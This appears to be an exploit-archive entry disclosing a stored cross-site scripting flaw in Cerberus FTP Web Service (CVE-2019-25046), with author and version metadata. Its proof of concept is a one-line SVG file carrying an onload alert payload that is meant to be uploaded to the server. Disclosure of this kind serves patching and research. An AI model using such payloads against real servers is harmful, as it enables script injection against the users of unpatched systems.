Cerberus ftp web service 11 svg stored crosssite scripting (xss) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-06-11 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Cerberus ftp web service 11 svg stored crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
# Date: 08/06/2021
# Exploit Author: Mohammad Hossein Kaviyany
# Vendor Homepage: www.cerberusftp.com
# Software Link: https://www.cerberusftp.com/download/
# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier
# Tested on: windows server 2016
# CVE: CVE-2019-25046
------------
About Cerberus FTP Server (From Vendor Site) :
Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS,
FIPS 140-2 validated, and Active Directory and LDAP authentication.
--------------------------------------------------------
Exploit Detailes :
This stored XSS bug happens when a user uploads an svg file with the following content :
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>